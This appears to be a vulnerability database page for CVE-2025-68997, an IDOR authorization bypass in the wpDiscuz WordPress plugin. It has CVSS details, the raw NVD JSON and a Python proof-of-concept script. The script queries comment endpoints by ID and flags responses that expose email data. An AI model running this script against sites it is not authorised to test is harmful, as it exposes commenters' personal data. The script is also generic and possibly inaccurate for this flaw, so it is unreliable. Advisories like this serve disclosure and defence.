Security Vulnerability Report
中文
CVE-2025-68997 CVSS 5.3 MEDIUM

CVE-2025-68997

Published: 2025-12-30 11:15:59
Last Modified: 2026-04-15 00:35:42

Description

Authorization Bypass Through User-Controlled Key vulnerability in AdvancedCoding wpDiscuz wpdiscuz allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects wpDiscuz: from n/a through <= 7.6.43.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

wpDiscuz <= 7.6.43 (所有7.x版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-68997 wpDiscuz IDOR Vulnerability PoC # Description: Unauthorized access to other users' comments via IDOR target_url = sys.argv[1] if len(sys.argv) > 1 else "http://target-site.com" def check_vulnerability(): """ Check if target WordPress site is vulnerable to CVE-2025-68997 This IDOR vulnerability allows unauthorized access to comments """ # Step 1: Identify wpDiscuz plugin version version_check_url = f"{target_url}/wp-content/plugins/wpdiscuz/readme.txt" # Step 2: Exploit IDOR by manipulating comment/user IDs # The vulnerability exists in the comment retrieval mechanism # where the plugin doesn't properly verify ownership exploit_payloads = [ # Attempt to access comment with ID 1 (example) f"{target_url}/wp-admin/admin-ajax.php?action=wpdiscuzCommentLoad&commentId=1", # Attempt to access another user's comment f"{target_url}/wp-json/wp/v2/comments/1", ] for payload in exploit_payloads: try: response = requests.get(payload, timeout=10) if response.status_code == 200: # Check if sensitive data is exposed if "id" in response.text and "email" in response.text: print(f"[+] Potential vulnerability detected at: {payload}") print(f"[+] Response contains unauthorized data") return True except requests.RequestException as e: print(f"[-] Request failed: {e}") print("[-] No obvious vulnerability detected") return False if __name__ == "__main__": print("CVE-2025-68997 wpDiscuz IDOR Vulnerability Checker") print("=" * 50) check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68997", "sourceIdentifier": "[email protected]", "published": "2025-12-30T11:15:58.567", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authorization Bypass Through User-Controlled Key vulnerability in AdvancedCoding wpDiscuz wpdiscuz allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects wpDiscuz: from n/a through <= 7.6.43."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wpdiscuz/vulnerability/wordpress-wpdiscuz-plugin-7-6-40-insecure-direct-object-references-idor-vulnerability?_s_id=cve", "source": "[email protected]"}]}}